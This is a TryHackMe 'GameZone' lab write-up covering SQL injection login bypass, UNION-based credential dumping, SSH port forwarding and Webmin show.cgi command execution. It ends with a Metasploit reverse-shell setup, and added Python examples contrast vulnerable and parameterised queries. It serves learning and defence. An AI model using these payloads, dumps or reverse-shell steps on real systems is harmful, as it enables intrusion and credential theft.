GameZone | SQLi & Port Forwarding

GameZone is a challenge that shows how a single vulnerable user input field can lead to database exploitation, stolen credentials, port forwarding and ultimately remote code execution.

by Johann Van Niekerk

Disclaimer: All topics discussed are intended solely for research purposes and not intended or endorsed for illegal activity.

GameZone is another TryHackMe challenge that chains SQLi, SSH and port forwarding techniques to get into, and then fully exploit, a vulnerable system.

GameZone Write up

Tackling SQLi & Portforwarding

Target Network Report

Name of Target:

GameZone

System Enumeration

NMAP SCAN:

# NMAP SCAN
sudo nmap -sV -Pn -p22,80 -T4 10.10.155.97
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-06 05:32 EST
Nmap scan report for 10.10.155.97
Host is up (0.28s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80

After the initial Nmap scan, prioritise the most likely way in. Port 22 may well become the entry point later, but SSH is normally hard to attack unless a username and some likely credentials are already known.

So the first target for enumeration is port 80, an Apache web service running over HTTP.

It is important to explore a web service thoroughly to understand the target and its likely attack surface: try every input field, scan the visible text, images and embedded links, and watch whether user input changes the page or is reflected back through the URL or elsewhere.

After a few ordinary attempts at the login form, it is time to see how the database reacts to a simple always-true statement: ' or 1=1;-- -

In this case only the username field was susceptible, and the always-true statement was enough to bypass the login page and reach /portal.php.

Log in field Vulnerable
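As an added example (not part of the original write-up or the challenge's own code), the following Python models the login query behind that form, with an in-memory SQLite database standing in for MySQL. The table and column names, the seed user and password, and the assumption that the password is hashed before it reaches the query are all constructed here; that hashing is one plausible reason only the username field was injectable, since a hex digest can never carry a quote into the SQL text. The vulnerable version builds the query by string concatenation, the hardened version binds parameters.

```python
import hashlib
import sqlite3

# Constructed stand-in for the challenge's MySQL 'users' table
# (names and values are assumptions, not data from the target).
SEED_USER = "agent47"
SEED_PASSWORD = "correct-horse-battery"   # constructed; the real one is not shown here


def sha256_hex(text):
    return hashlib.sha256(text.encode()).hexdigest()


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    con.execute("INSERT INTO users VALUES (?, ?)",
                (SEED_USER, sha256_hex(SEED_PASSWORD)))
    return con


def login_vulnerable(con, username, password):
    """Login as the write-up describes it: the password is hashed (assumption),
    then both values are pasted straight into the SQL text. Only 'username'
    can therefore carry a quote into the query."""
    pwd_hash = sha256_hex(password)
    query = (f"SELECT username FROM users "
             f"WHERE username='{username}' AND pwd='{pwd_hash}'")
    return [row[0] for row in con.execute(query)]


def login_hardened(con, username, password):
    """Same check with bound parameters: the input is data, never SQL."""
    query = "SELECT username FROM users WHERE username=? AND pwd=?"
    params = (username, sha256_hex(password))
    return [row[0] for row in con.execute(query, params)]


BYPASS = "' or 1=1;-- -"   # the always-true payload from the write-up

if __name__ == "__main__":
    con = make_db()
    # The comment marker swallows the rest of the query, so the WHERE clause
    # collapses to "username='' or 1=1" and the first user comes back.
    print("vulnerable, bypass payload :", login_vulnerable(con, BYPASS, "junk"))
    print("hardened,  bypass payload  :", login_hardened(con, BYPASS, "junk"))
    print("hardened,  real credentials:", login_hardened(con, SEED_USER, SEED_PASSWORD))
```

The hardened query still logs in the real user, so parameter binding costs nothing in functionality; the only thing it removes is the attacker's ability to change the shape of the statement.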

/portal.php

With the SQL injection the /portal.php page is reachable. It presents a search bar whose results show two fields, title and review.

Again, the search bar can be probed the same way. Searching for "test" returns nothing and a number such as "1" returns nothing, but falling back to the always-true statement displays numerous entries. This confirms that SQL injection is the way to get further.

Auto SQLmap Method

Exploitation can be automated with sqlmap to inject and discover confidential information. The easiest way is to save the captured request from Burp Suite to a text file and hand that file to sqlmap, which does the filtering and interpretation with its own tooling.

To do this, run Burp Suite to capture the requests and responses, then submit a 'test' query on the search page so the POST request is captured.

POST Request
#BURPSUITE
    launch burpsuite
    capture the 'POST' request by sending a test query on the page
    right click and save the request to a file, e.g. 'burp'

#SQLMAP
    sqlmap -r burp --dbms=mysql --dump
    #-r: replay the saved request and test its parameters; --dbms=mysql: skip fingerprinting; --dump: dump the table contents
Steps to utilise Burp with SQLmap

The username and password hash were uncovered. This hash can now be cracked or used for further exploitation.

Manual SQLi Method

The same enumeration can be completed without sqlmap. The key is group_concat(expr), which collapses many rows into a single string, so a whole result set can be read back through one reflected column instead of needing many reflected columns. This will become clear in the following notes, which also show how to format the output in a human-readable way.

Again, it is important to test the user input on the search bar.

#DETERMINE COLUMNS IN DATABASE
    #Start with 1, then 1,2, then 1,2,3 and so on until the database stops complaining about a mismatched number of columns
    ' union select 1,2,3;-- -

This shows that the query has three columns in total, of which columns 2 and 3 are reflected (visible) on the page.

Gather more information!

#DUMP USER() and DATABASE()
    ' union select 1,2,user();-- -
    ' union select 1,2,database();-- -

From here it is possible either to dump every table name through information_schema, or, since database() has revealed the name 'db', to target that database directly, which is the cleaner option.

#DUMP ALL FROM SCHEMA
    #INFO OVERLOAD
    ' union select 1,table_schema,table_name from information_schema.tables;-- -
#DUMP SPECIFIC DATABASE
    ' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='db';-- -
    #takes in the argument with the name of the Database gathered from database()

As shown above, group_concat() puts both table names into the single reflected column.

#DUMP COLUMN NAMES in Users
    ' union select 1,2,group_concat(column_name) from information_schema.columns where table_name ='users';-- -
#DUMP username,pwd
    ' union select 1,2,group_concat(username,':',pwd SEPARATOR '<br>') from users;-- -
    
    #username,':',pwd: used to display in a user:pass format otherwise it gets combined into a single string
    #SEPARATOR '<br>': used to separate each entry on a separate line (in this case there was only 1 user:pass single line)

The above command dumps the result in a convenient 'username:hash' form that is far more readable. If there were 10 entries, group_concat() would list all of them, one per line, within the same column.

With this, the SQL database has been enumerated and the hashes retrieved manually as well.
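To show how the column-count probe, the UNION payloads and group_concat() above fit together, here is an added Python example (not from the write-up or the challenge) that replays the manual method against an in-memory SQLite database standing in for the challenge's MySQL one. Table names, rows and hash values are constructed. Two MySQL-specific pieces are swapped for SQLite equivalents and marked as such in the comments: information_schema becomes sqlite_master and pragma_table_info(), and group_concat(... SEPARATOR '<br>') becomes group_concat(expr, '<br>') with || for string concatenation. The column-count probe is the general form of the "start with 1, then 1,2, then 1,2,3" loop.

```python
import sqlite3

# Constructed stand-in for the challenge database (names and values are assumptions).
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE post (id INTEGER, title TEXT, review TEXT);
        INSERT INTO post VALUES (1, 'Hitman 2', 'Stealth done right');
        INSERT INTO post VALUES (2, 'Portal 2', 'Still a classic');
        CREATE TABLE users (username TEXT, pwd TEXT);
        INSERT INTO users VALUES ('agent47', 'hash-of-agent47-password');
        INSERT INTO users VALUES ('diana', 'hash-of-diana-password');
    """)
    return con


def search_vulnerable(con, q):
    """The portal search as the write-up describes it: three selected columns,
    of which the page reflects title and review, and unsanitised input."""
    query = f"SELECT id, title, review FROM post WHERE title LIKE '%{q}%'"
    return con.execute(query).fetchall()


def search_hardened(con, q):
    """Same search with the term bound as a parameter; any UNION text is just data."""
    query = "SELECT id, title, review FROM post WHERE title LIKE ?"
    return con.execute(query, (f"%{q}%",)).fetchall()


def find_column_count(con, limit=10):
    """Grow 'union select 1,2,...' until the database stops rejecting the
    column-count mismatch; the first count that runs cleanly is the answer."""
    for n in range(1, limit + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        try:
            search_vulnerable(con, f"' union select {cols};-- -")
            return n
        except sqlite3.OperationalError:   # "... do not have the same number of result columns"
            continue
    return None


def injected_value(con, payload):
    """Run a 'union select 1,2,<expr>' payload and return <expr> from the injected
    row, which is the one whose first two columns are the filler values 1 and 2."""
    for row in search_vulnerable(con, payload):
        if tuple(row[:2]) == (1, 2):
            return row[2]
    return None


def list_tables(con):
    # MySQL: group_concat(table_name) from information_schema.tables where table_schema='db'
    return injected_value(con, "' union select 1,2,group_concat(name) "
                               "from sqlite_master where type='table';-- -")


def list_columns(con, table):
    # MySQL: group_concat(column_name) from information_schema.columns where table_name='users'
    return injected_value(con, "' union select 1,2,group_concat(name) "
                               f"from pragma_table_info('{table}');-- -")


def dump_credentials(con):
    # MySQL: group_concat(username,':',pwd SEPARATOR '<br>') from users
    return injected_value(con, "' union select 1,2,group_concat(username||':'||pwd, '<br>') "
                               "from users;-- -")


if __name__ == "__main__":
    con = make_db()
    print("columns in the search query:", find_column_count(con))
    print("tables:", list_tables(con))
    print("columns in users:", list_columns(con, "users"))
    for entry in dump_credentials(con).split("<br>"):
        print("cred:", entry)
    print("hardened search with UNION payload:",
          search_hardened(con, "' union select 1,2,3;-- -"))
```

Because the injected SELECT is glued onto a query that also returns the real posts, the attacker's row has to be picked out of the mix; the filler values 1 and 2 serve that purpose here, which is why the write-up's payloads keep them rather than using real column expressions in every position.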

Port 22

With the username known and the hash cracked, it is now a matter of finding where these credentials are accepted. Recall that port 22 was open; that is the first target.

The credentials worked and gave remote access to the host as a regular user.

The initial flag is located in the home directory:

After testing several privilege escalation methods without success, the next check was for listening ports, including any that are blocked from the outside.

#CHECK LISTENING PORTS
    ss -tulpn               :list listening (-l) TCP (-t) and UDP (-u) sockets with numeric addresses (-n) and the owning process (-p)

This check uncovers a service on port 10000 that listens on localhost only. It is an unusual port to begin with, and a locally bound listener that Nmap could not see is interesting, so it becomes the first target.

Normally such a service is reachable only from the host itself, but SSH local port forwarding makes it reachable from the attacker's machine with very little effort.

#SSH Portforwarding
    ssh -L 10000:localhost:10000 agent47@10.10.35.7                 :[Attacker Machine] local port 10000 is tunnelled to 127.0.0.1:10000 on the target

Once this is running and the SSH login succeeds, the port is forwarded and the content can be reached from the attacker's machine at localhost:10000; unsurprisingly, it is a web service.
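The procedure above (list listening sockets, pick out the ones bound to loopback, forward them over SSH) generalises to any host, so here is an added Python helper, not from the write-up, that parses `ss -tulpn` output, reports the TCP listeners that are only reachable from the host itself, and prints the matching `ssh -L` line. The sample output is constructed for the example and is not a capture from the target; the user and host in the forward command are the ones the write-up uses.

```python
# Constructed sample of `ss -tulpn` output (not captured from the target).
SAMPLE_SS = """\
Netid State  Recv-Q Send-Q     Local Address:Port  Peer Address:Port Process
udp   UNCONN 0      0          127.0.0.53%lo:53    0.0.0.0:*
tcp   LISTEN 0      128        0.0.0.0:22          0.0.0.0:*
tcp   LISTEN 0      128        127.0.0.1:10000     0.0.0.0:*
tcp   LISTEN 0      128        *:80                *:*
tcp   LISTEN 0      128        [::]:22             [::]:*
"""


def parse_ss(text):
    """Parse `ss -tulpn` output into (proto, state, address, port) tuples."""
    sockets = []
    for line in text.splitlines()[1:]:          # first line is the header
        fields = line.split()
        if len(fields) < 5:
            continue
        addr, _, port = fields[4].rpartition(":")  # split on the last ':' so IPv6 survives
        addr = addr.split("%")[0]                  # drop a scope suffix such as 127.0.0.53%lo
        sockets.append((fields[0], fields[1], addr, int(port)))
    return sockets


def is_loopback(addr):
    a = addr.strip("[]")
    return a.startswith("127.") or a == "::1"


def loopback_only_listeners(sockets):
    """TCP listeners bound to loopback: invisible to Nmap from outside, reachable
    only from the host itself, and therefore candidates for SSH port forwarding."""
    return sorted({(addr, port) for proto, state, addr, port in sockets
                   if proto == "tcp" and state == "LISTEN" and is_loopback(addr)})


def forward_command(user, host, port, local_port=None):
    """Build the ssh -L line that exposes the target's loopback port on the attacker box."""
    local_port = local_port or port
    return f"ssh -L {local_port}:localhost:{port} {user}@{host}"


if __name__ == "__main__":
    for addr, port in loopback_only_listeners(parse_ss(SAMPLE_SS)):
        print(f"{addr}:{port} is local-only ->", forward_command("agent47", "10.10.35.7", port))
```

Sockets bound to 0.0.0.0 or [::] are already exposed and need no tunnel; the interesting lines are exactly those where the local address is a loopback address, which is what the filter keeps.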

With Burp Suite still capturing traffic, the version information can be read from the responses, which identify the service as Webmin.

The banner on the page makes it evident that this is Webmin 1.580.
Additionally, the same credentials work here and allow logging in as agent47.

The next step is to research this service and check for any reported vulnerabilities.

Reviewing the available exploits confirms that this version of the web service is vulnerable to remote code execution:

#VULNERABILITY
The vulnerability exists in the /file/show.cgi component and allows an authenticated user, with access to the File Manager Module, to execute arbitrary commands with root privileges.

Without Metasploit

Since the vulnerability lets an authenticated user run commands through show.cgi, commands or a full exploit can be sent simply by crafting the URL in order to get a connection. As a proof of concept, browsing to $RHOST/file/show.cgi/etc/passwd returns the contents of /etc/passwd.

Similarly, the root flag can be read by requesting /root/root.txt through the same path.

With Metasploit

Searching Metasploit for webmin 1.580 finds the same exploit packaged as a module.
When setting the options, remember that access goes through the tunnel, so RHOST is the localhost address 127.0.0.1 rather than the target's IP:

#METASPLOIT
    use exploit/unix/webapp/webmin_show_cgi_exec
    set rhost 127.0.0.1
    set username agent47
    set password *******
    set ssl false
    set lhost tun0
    set payload cmd/unix/reverse
    run

There you have it. Tackling this challenge both with automated tools such as sqlmap and Metasploit and by hand has shown the benefits of each approach. Hopefully it was beneficial and you were able to take something away from it.

And finally, if you enjoyed the content and want to see more; I need coffee to stay awake and this is not a bribe. 👌